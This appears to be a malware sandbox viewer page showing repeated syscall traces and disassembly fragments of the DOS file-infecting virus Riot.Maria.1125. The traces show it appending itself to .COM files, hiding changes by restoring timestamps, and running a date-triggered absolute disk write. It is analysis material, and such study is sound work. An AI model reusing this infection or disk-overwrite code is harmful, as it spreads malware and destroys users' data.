Sample viewer

vx.netlux.org/Virus.DOS.Riot.Maria.1125

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:45:26.241295139Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.244022732Z 71 PC: 12b49 | Get current directory
2018-12-17T22:45:26.248941901Z 59 PC: 12b54 | Change current directory
2018-12-17T22:45:26.25374421Z 26 PC: 12c08 | Set disk transfer address
2018-12-17T22:45:26.255507842Z 78 PC: 12c16 | Find first file
2018-12-17T22:45:26.270429808Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:26.283863999Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:45:26.29156337Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T22:45:26.294842899Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T22:45:26.312208284Z 62 PC: 12cac | Close file
2018-12-17T22:45:26.315739767Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:26.325662533Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:26.329026351Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.332166939Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.335510018Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:45:26.33758245Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.340057489Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T22:45:26.350048834Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.353817502Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T22:45:26.355656115Z 62 PC: 12d11 | Close file
2018-12-17T22:45:26.380558095Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T22:45:26.393566076Z 79 PC: 12c2a | Find next file
2018-12-17T22:45:26.396437579Z 61 PC: 12c42 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:26.402857006Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:45:26.417439304Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T22:45:26.42310818Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T22:45:26.435422258Z 62 PC: 12cac | Close file
2018-12-17T22:45:26.439068076Z 61 PC: 12cb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:26.446837758Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:26.450424144Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.456303486Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.461163334Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:45:26.464995471Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.467947204Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T22:45:26.476731212Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.479218514Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T22:45:26.481243356Z 62 PC: 12d11 | Close file
2018-12-17T22:45:26.489704167Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T22:45:26.499070419Z 79 PC: 12c2a | Find next file
2018-12-17T22:45:26.501936041Z 61 PC: 12c42 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:26.509061423Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:45:26.515579154Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T22:45:26.517951991Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T22:45:26.528243219Z 62 PC: 12cac | Close file
2018-12-17T22:45:26.530421721Z 61 PC: 12cb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:26.537090456Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:26.540981644Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.543808714Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:45:26.546546165Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:45:26.548943467Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.551991211Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T22:45:26.560260943Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T22:45:26.56362947Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T22:45:26.565657338Z 62 PC: 12d11 | Close file
2018-12-17T22:45:26.573071263Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T22:45:26.582900524Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-17T22:45:26.585783208Z 59 PC: 12d9f | Change current directory
2018-12-17T22:45:26.589923984Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:15.682746652Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:15.685547258Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:15.688772237Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:15.693077839Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:15.69447551Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:15.701651346Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.7092291Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:15.719349421Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:15.722262619Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:15.742510479Z 62 PC: 12cac | Close file
2018-12-25T12:21:15.74433597Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.751692213Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:15.758878999Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.761689668Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.764996728Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:15.766623324Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.768999799Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:15.778686001Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.780433816Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:15.781679071Z 62 PC: 12d11 | Close file
2018-12-25T12:21:15.795653029Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:15.802359762Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:15.80443587Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:15.809792139Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:15.814451321Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:15.816033339Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:15.822773405Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:15.824528412Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:15.828811333Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:15.831154813Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:15.834237574Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:15.837100342Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:15.83861706Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.841380245Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:15.851209061Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.853625593Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:15.864592003Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:15.86994812Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:15.880677986Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:15.884787501Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:15.891966332Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:15.899121537Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:15.902068227Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:15.913475304Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:15.915397133Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:15.923555052Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:15.926721092Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:15.929429067Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:15.933005628Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:15.934749132Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.93720641Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:15.950247155Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.953474072Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:15.955665893Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:15.964551557Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:15.976506984Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:15.979045485Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:15.983491696Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:15.895727985Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:15.898852712Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:15.902097749Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:15.906701643Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:15.908643992Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:15.915338751Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.922395401Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:15.929288074Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:15.931693771Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:15.950607035Z 62 PC: 12cac | Close file
2018-12-25T12:21:15.953289519Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:15.960799151Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:15.96810041Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.970825612Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:15.974014853Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:15.975636456Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.980218496Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:15.990313143Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:15.992703909Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:15.994195431Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.003094579Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.013064903Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.014811622Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.019733299Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.023950744Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.025522218Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.032975856Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.034905926Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.041976205Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.044770637Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.047640396Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.0502468Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.051603427Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.054509808Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.064052678Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.066407476Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.072269634Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.07887793Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.089981124Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.092824637Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.097033259Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.101247159Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.103753303Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.110476035Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.111698226Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.116485108Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.118392582Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.120310337Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.123702774Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.125098659Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.127164394Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.136521641Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.138903151Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.140403609Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.148850616Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.160673926Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:16.173227233Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.177593289Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.11003441Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:16.113176716Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.116969852Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.121747306Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.124403258Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.131398039Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.139152501Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.146550945Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:16.149309752Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.168890655Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.170758842Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.182771105Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.190061671Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.192899112Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.203158062Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.204836966Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.207214707Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.217406444Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.219800977Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.221372159Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.23071996Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.24162316Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.24525126Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.252817401Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.261237927Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.263813426Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.275017874Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.278242059Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.285734021Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.28887141Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.292560956Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.295850792Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.297977304Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.301978641Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.312095061Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.314490227Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.317153311Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.325871068Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.337256235Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.341477964Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.348794705Z 63 PC: 12c54 | Read file or device (See above)
